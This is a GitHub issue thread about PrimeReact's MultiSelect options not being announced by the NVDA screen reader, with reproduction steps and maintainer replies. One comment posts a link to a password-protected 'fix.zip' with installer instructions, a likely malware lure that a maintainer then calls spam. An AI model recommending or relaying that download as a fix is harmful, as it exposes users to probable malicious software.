### ISSUE TITLE
MultiSelect options are not announced by screen reader when moving thru them

### ISSUE THREAD

**Issue by qpn1206** [primefaces/primereact#7088]
### Describe the bug

PrimeReact - latest version 10.8.2 - MultiSelect options are not announced by screen reader (using both Tab and Arrow keys)

### System Information

```
System:
    OS: Windows 10 10.0.19045
    CPU: (20) x64 13th Gen Intel(R) Core(TM) i7-1370P
    Memory: 9.29 GB / 31.64 GB
  Binaries:
    Node: 16.14.0 - C:\Program Files\nodejs\node.EXE
    Yarn: 1.22.22 - ~\AppData\Roaming\npm\yarn.CMD
    npm: 8.3.1 - C:\Program Files\nodejs\npm.CMD
  Browsers:
    Edge: Chromium (127.0.2651.98)
    Internet Explorer: 11.0.19041.4355
  npmPackages:
    primereact: 10.8.2 => 10.8.2
    react: ^17.0.1 => 17.0.2
    tailwindcss: ^3.3.5 => 3.4.10
```

### Steps to reproduce the behavior

1. Open NVDA -> Expand MultiSelect component
2. Using tab or arrow keys to navigate thru options
3. Option items are not announced by screen reader

### Expected behavior

Screen reader can announce the content of option

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by melloware** [comment]
That was a spammer i just deleted it.

**Comment by gayathrirajendran** [comment]
@melloware will this be picked up anytime soon ?

**Comment by melloware** [comment]
@gayathrirajendran not by my but if someone wants to pick it up you can probably look at what PrimeVue is doing and make this component work the same.
